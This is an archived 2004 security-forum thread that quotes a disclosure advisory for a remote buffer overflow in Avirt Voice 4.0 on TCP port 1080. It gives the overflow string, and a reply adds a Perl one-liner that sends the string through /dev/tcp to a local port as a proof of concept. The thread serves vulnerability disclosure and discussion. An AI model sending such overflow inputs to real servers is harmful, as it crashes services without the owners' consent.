Nexcess
Feb 24 2004, 06:53 AM
| QUOTE |
Application: Avirt Voice
hxxp://www.avirt.com/
Version: 4.0
Bug: Remote Buffer Overflow
Author: Donato Ferrante
e-mail: fdonato@autistici.org
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1. Description
2. The bug
3. The code
4. The fix
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
----------------
1. Description:
----------------
Vendor's Description:
"Avirt Voice acts as an H.323 gateway between IP networks. It allows
users to operate H.323 applications, like Microsoft NetMeeting, Intel
Video Phone, or Netspeak Webphone, from behind a firewall.
Because Voice is a software solution, it is more easily scalable and
much less expensive than hardware alternatives."
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
2. The bug:
------------
The program doesn't well manage the received strings on the TCP port
1080. In fact it will have a buffer overflow.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-------------
3. The code:
-------------
To test the vulnerability simply send to the server ( port 1080 ) a
string like:
GET aaaa[ 1113 of a ]aaaa
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
4. The fix:
------------
Vendor was contacted.
Bug will be fixed in the next version of Avirt Voice.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
T3cHn0b0y
Feb 24 2004, 09:50 AM
Thanks for the info m8! Let's see if we can develope some PoC.
bitwild
Feb 24 2004, 10:50 AM
PoC - unchecked :) - how about :
| CODE |
-su-2.05b# echo $BASH_VERSION
2.05b.0(1)-release
-su-2.05b# perl -e '{print "GET ";print "a"x"1113"}' >> /dev/tcp/127.0.0.1/1080
|
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
